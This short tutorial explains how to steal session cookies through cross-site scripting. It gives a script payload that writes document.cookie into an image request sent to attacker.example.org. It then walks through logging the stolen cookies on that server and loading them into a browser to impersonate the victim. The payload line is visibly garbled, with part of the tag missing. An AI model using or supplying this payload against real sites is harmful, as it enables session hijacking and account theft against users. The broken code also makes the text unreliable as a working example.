How to steal cookies using XSS
<script>document.write('<img height=0 width=0
encodeURI(document.cookie) + '"/>')</script>
This will create a link like the one below. The script will be executed when you click on the link
This is Sample malicious URL for stealing cookie.
Before attempting this attack, you will need to set up a web server somewhere (such as attacker.example.org as suggested in Example 1 ). Ensure that a file called cookie_log exists in the appropriate location on your web server. It does not actually need to log anything because the HTTP server will do the logging for you.
In the solution, you may need to experiment with various syntactic issues to get the attack to work. You may need to use characters such as ', ", and > to break out of existing HTML tags so that you can inject your script. View the HTML source of the web page to determine whether your input is resulting in syntactically correct HTML. Now, whenever that script executes, it will send the user's session cookie to attacker.example.org, which is controlled by the attacker. To view the cookies, simply view the httpd log files on your web server (attacker.example.org) or create a script called cookie_log that logs the parameters sent to it. Then, to gain access to that user's session, URI-decode the cookie and use a tool such as the Firefox Edit Cookies extension to add it to a browser. Then, you will be able to access the web application as the authenticated user from that browser